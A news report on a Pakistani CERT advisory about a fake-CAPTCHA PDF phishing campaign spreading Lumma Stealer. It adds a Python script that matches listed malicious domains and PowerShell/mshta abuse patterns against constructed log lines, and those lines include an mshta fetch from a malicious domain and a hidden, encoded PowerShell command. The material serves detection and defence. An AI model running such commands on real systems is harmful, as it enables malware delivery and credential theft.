Pakistan’s National Computer Emergency Response Team (National CERT) has issued an alert regarding an extensive phishing campaign leveraging fake CAPTCHA images in PDF files to distribute Lumma Stealer malware.
The cyberattack has impacted thousands of users, primarily targeting the technology, financial services, and manufacturing sectors. Most victims are located in North America, Asia, and Southern Europe.
According to National CERT, cybercriminals have poisoned search engine results (SEO poisoning) so that fraudulent PDFs rank for common document searches. These documents contain a deceptive CAPTCHA image that prompts users to click a link, which leads to phishing sites designed to steal sensitive financial data or to install Lumma Stealer malware.
Attackers have used platforms such as PDFCOFFEE, PDF4PRO, and Internet Archive to host these malicious PDFs, increasing their visibility in search results and making them appear legitimate.
Lumma Stealer, sold as a Malware-as-a-Service (MaaS) offering, is capable of extracting saved login credentials, browser cookies, and cryptocurrency wallet data. Additionally, the malware deploys GhostSocks, a proxy component that lets the operators relay their own traffic through the victim's internet connection.
The stolen credentials are reportedly being sold on underground forums like Leaky[.]pro, while malicious domains associated with this campaign include pdf-freefiles[.]com, webflow-docs[.]info, secure-pdfread[.]site, and docsviewing[.]net.
National CERT has advised organizations to implement robust security measures to mitigate the risk. Recommended actions include phishing awareness training for employees, deployment of endpoint detection and response tooling, and restricting the execution of PowerShell and mshta.exe, the built-in Windows tools that fake-CAPTCHA lures commonly abuse to launch a malware loader.
Other critical steps include blocking the listed malicious domains at the DNS and proxy layers, enabling PowerShell logging (script block logging in particular, so that executed commands are recorded), enforcing multi-factor authentication (MFA), and monitoring search engine results for look-alike domains impersonating legitimate document services.
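The domain blocking and PowerShell logging recommendations above only pay off if someone actually checks the resulting logs against the published indicators. The following script is an added example, not part of the National CERT advisory or any vendor tooling: it refangs the four domains the advisory lists, then scans constructed DNS, proxy and PowerShell script-block (Event ID 4104) log lines for those domains and for the living-off-the-land patterns (mshta.exe, encoded or hidden-window PowerShell, download cmdlets) that such lures rely on. The log format, hostnames, timestamps and the LOLBin regexes are this example's own assumptions.

```python
"""IOC and LOLBin matching over log lines for the fake-CAPTCHA / Lumma Stealer campaign.

Added example; the log samples below are constructed for illustration and the
detection patterns are this script's own, not the advisory's.
"""
import re

# Defanged indicators exactly as published in the advisory; refanged at runtime
# so the defanged form can be pasted into a blocklist or this script unchanged.
ADVISORY_DOMAINS = [
    "pdf-freefiles[.]com",
    "webflow-docs[.]info",
    "secure-pdfread[.]site",
    "docsviewing[.]net",
]


def refang(domain: str) -> str:
    """Turn 'example[.]com' back into a matchable 'example.com'."""
    return domain.replace("[.]", ".").lower()


IOC_DOMAINS = {refang(d) for d in ADVISORY_DOMAINS}

# Living-off-the-land patterns worth flagging in script-block and process logs.
# These regexes are assumptions of this example, tuned for readability, not for
# production false-positive rates.
LOLBIN_PATTERNS = [
    (re.compile(r"\bmshta(?:\.exe)?\b", re.I), "mshta execution"),
    # -e / -ec / -en / -enc / -encodedcommand followed by a base64 blob
    (re.compile(r"-e(?:c|n|nc|ncodedcommand)?\b\s+[A-Za-z0-9+/=]{20,}", re.I),
     "encoded PowerShell command"),
    (re.compile(r"-w(?:indowstyle)?\s+hidden\b", re.I), "hidden window"),
    (re.compile(r"\b(?:iwr|invoke-webrequest|irm|invoke-restmethod|downloadstring)\b", re.I),
     "web download cmdlet"),
]

# Anything that looks like a dotted hostname inside a URL, DNS query or command line.
HOST_RE = re.compile(r"(?:https?://)?((?:[a-z0-9-]+\.)+[a-z]{2,})", re.I)


def extract_hosts(line: str) -> set:
    """Return lowercased hostname-like tokens found in one log line."""
    return {m.lower() for m in HOST_RE.findall(line)}


def matched_iocs(line: str) -> set:
    """IOC domains hit by the line, matching the domain itself or any subdomain."""
    hits = set()
    for host in extract_hosts(line):
        for ioc in IOC_DOMAINS:
            if host == ioc or host.endswith("." + ioc):
                hits.add(ioc)
    return hits


def analyze(line: str) -> list:
    """Return a list of finding labels for one line; empty list means nothing suspicious."""
    findings = [f"IOC domain: {d}" for d in sorted(matched_iocs(line))]
    for pattern, label in LOLBIN_PATTERNS:
        if pattern.search(line):
            findings.append(label)
    return findings


def scan(lines) -> list:
    """Return (line, findings) pairs for every line that produced at least one finding."""
    results = []
    for line in lines:
        findings = analyze(line)
        if findings:
            results.append((line, findings))
    return results


# Constructed sample log lines (not real traffic). The 'ps-4104' lines stand in for
# PowerShell script block log events, which only exist once script block logging is on.
SAMPLE_LOGS = [
    "2025-03-05T10:12:01Z proxy allow user=jdoe url=https://cdn.pdfcoffee-example.test/report.pdf",
    "2025-03-05T10:12:44Z dns query=www.secure-pdfread.site type=A client=10.0.4.17",
    '2025-03-05T10:13:02Z ps-4104 host=WS-17 script="mshta https://docsviewing.net/verify"',
    '2025-03-05T10:13:09Z ps-4104 host=WS-17 script="powershell -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"',
    "2025-03-05T10:15:30Z proxy allow user=asmith url=https://intranet.example.test/captcha.png",
]

if __name__ == "__main__":
    for line, findings in scan(SAMPLE_LOGS):
        print(f"{line}\n    -> {', '.join(findings)}")
```

Two of the five constructed lines are clean and three are flagged: the DNS query hits a subdomain of a listed indicator, the first script-block line both contacts a listed domain and launches mshta, and the second carries an encoded, hidden-window PowerShell command. Script block logging, which produces the 4104 events this scan depends on, is switched on through the EnableScriptBlockLogging value under the Windows PowerShell policy key (Group Policy or registry); without it there is nothing for the last two patterns to match.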
The advisory highlights the increasing sophistication of cyber threats and urges organizations to adopt proactive security strategies. Best practices such as regular patch management, restricting administrative privileges, and application allow-listing were emphasized to strengthen defenses and prevent data breaches.
